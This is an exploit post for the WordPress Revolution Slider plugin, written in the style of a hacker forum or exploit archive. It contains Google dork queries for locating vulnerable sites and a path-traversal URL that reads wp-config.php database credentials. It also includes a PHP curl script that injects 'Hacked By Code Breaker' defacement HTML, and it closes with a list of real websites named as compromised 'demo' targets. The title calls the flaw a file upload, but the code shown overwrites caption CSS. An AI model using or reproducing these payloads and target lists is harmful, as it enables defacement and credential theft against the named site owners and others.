Wordpress Plugin Revolution Slider - Unrestricted File Upload

######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: inurl://"co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action"
inurl://".co.il/wp-admin/admin-ajax.php?action="
inurl:admin-ajax.php?action=revslider_show_image
-intext:"revslider_show_image" & your own
# Exploit Author: Code Breaker(Team Cyber Switch)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Get Config/database mysql :  victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# Vulnerable File : revslider_admin.php

# Exploit :

<?php

$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center>Hacked By Code Breaker<p style='color: transparent'>"
);

$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

?>

# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

- REFERENCE
[2] http://www.exploit4arab.net/exploits/1405

Demo:
http://www.neshot.org.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://lior-tzalamim.co.il/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://mcity.se/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://tres.co.il//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://thinkdenovo.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://www.zabner.co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://rozlaw.co.il//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://smart280.co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://www.ibambini.co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://sonusfaber.co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://emech.co.in/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://executivebuilders.pk/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://promoteindia.in/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css